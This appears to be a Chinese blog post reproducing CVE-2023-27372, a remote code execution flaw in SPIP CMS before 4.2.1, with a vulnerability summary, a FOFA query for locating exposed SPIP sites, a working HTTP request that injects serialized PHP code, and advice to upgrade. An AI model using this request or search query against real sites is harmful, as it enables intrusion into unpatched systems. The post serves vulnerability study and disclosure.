首页 > 其他分享 >【漏洞复现】CVE-2023-27372 RCE漏洞

【漏洞复现】CVE-2023-27372 RCE漏洞

时间:2023-07-13 16:00:59浏览次数:58  
标签:27372 SPIP spip formulaire 漏洞 复现 2023 action

产品介绍

SPIP是一个互联网发布系统,其中非常重视协作工作,多语言环境和Web作者的易用性。它是自由软件,在GNU/GPL许可证下分发。这意味着它可以用于任何互联网站点,无论是个人的还是机构的,非营利的还是商业的。

漏洞概述

SPIP Cms v4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当,没有对序列化字符串进行过滤,从而触发命令执行漏洞。

影响版本


SPIP < 4.2.1

复现环境

靶场下载:spip V4.0.8

FOFA:app="SPIP"

漏洞复现

POC:

POST /spip/spip.php?page=spip_pass HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: cibcInit=oui
Content-Length: 215
Content-Type: application/x-www-form-urlencoded

page=spip_pass&formulaire_action=oubli&formulaire_action_args=JWFEz0e3UDloiG3zKNtcjKCjPLtvQ3Ec0vfRTgIG7u7L0csbb259X%2Buk1lEX5F3%2F09Cb1W8MzTye1Q%3D%3D&oubli=s:19:"<?php phpinfo(); ?>";&nobot=

其中 formulaire_action_args 参数需访问路径:/spip.php?page=spip_pass 获取,标签为:input,name为:formulaire_action_args

EXP:

修复建议

建议及时更新至最新版本。

标签:27372,SPIP,spip,formulaire,漏洞,复现,2023,action
From: https://www.cnblogs.com/spmonkey/p/17550492.html

相关文章

  • 基于Qt的自动贩卖机系统[2023-07-13]
    基于Qt的自动贩卖机系统[2023-07-13]某公司请你为其生产的自动贩卖机编写软件。这种无人值守自动贩卖机贩卖价值为ABC三种商品,价格分别为2元,3元和6元。顾客投入10元的纸币,然后选择购买3种商品之一,自动贩卖机吐出商品,并且找给用户零钱。如果商品用完,或者无法找零,则给出用户一个提......
  • 【漏洞复现】用友NC uapjs RCE漏洞(CNVD-C-2023-76801)
    产品介绍    用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。漏洞概述     用友NC及NCCloud系统存在任意文件上......
  • 2023烟台7天编程集训笔记4
    匈牙利算法点击查看代码//匈牙利算法代码//匈牙利算法可用邻接矩阵和编表,优化用编表,不优化用邻接矩阵//时间复杂度:O(n^3)#include<bits/stdc++.h>usingnamespacestd;boolz[maxn][maxn],vis[maxn];//z[i][j]代表左边第i个点和右边第j个点能不能匹配vis[i]代表右边......
  • 2023 Hive 面试大纲
    先说一些废话总结一下Hive面试宝典中的要点,方便读者快速过一遍Hive面试所需要的知识点。本文请搭配Hive面试宝典来食用更美味哟┗(▔,▔)┛方便自己系统性回忆,根据*的数量来标记重要性*简单了解**熟悉掌握***需要精通Hive的介绍(*)Hive和Hadoop的关系Hive的特......
  • 【2023-07-12】一举多得
    20:00世上哪有那么多坏人。有很多人只是运气不好罢了。                                                 ——贝蒂·史密斯本周日是何太的生日,如果单单只是在家里买个......
  • SSO2.0 24-20230712
                    ......
  • [渗透测试]—3.3 漏洞评估和报告编写
    在渗透测试过程中,漏洞评估和报告编写是非常重要的环节。漏洞评估可以帮助你确定哪些漏洞更加关键,需要优先修复。而报告则是向客户或公司领导展示渗透测试结果的关键文档。本节将介绍漏洞评估和报告编写的基本概念、方法和要点。1.漏洞评估漏洞评估是对已发现的安全漏洞进行分析......
  • 2023.7.12
    今天又是早起的一天八点半去练车所以今天自己溜达到驾校有点热呜呜今天教练去监考他把车给我让我自己练,真的是太放心我了哈哈哈,还让我教会另一个姐姐倒车入库后来那个姐姐走了,就剩下我自己一个人练车,真的很自由,除了有点费脚没啥毛病后来又来了一位稍微年长的姐姐,很热情,我俩又......
  • 2023.7.12
    早上和平时一样没什么特别的,只是刷刷视频,有时学着做吃的,中午脑袋疼,又去诊所拿了些药,眼泪不知道为什么一直不停的流,脑袋也比平时热,医生说我是细菌感染,我很无语,但还是开了药,下午躺着睡了一下午,终于才缓了过来,起床后吃了中午没吃的饭,蛋炒饭加上泡姜,还是不错的,继续在pta上完成了一些题......
  • 2023暑假集训
    20230710I-VisitingFriend(点双/圆方树)题意多次询问两个点之间所有路径可能经过的点数,路径只需要满足起点和终点不重复经过。\(N,M,Q ≤ 5\times10^5\)题解建出圆方树,方点点权设为0,圆点点权设为1。维护一下子树和,讨论两个点的LCA是不是其中一个点两种情况,删去不可能......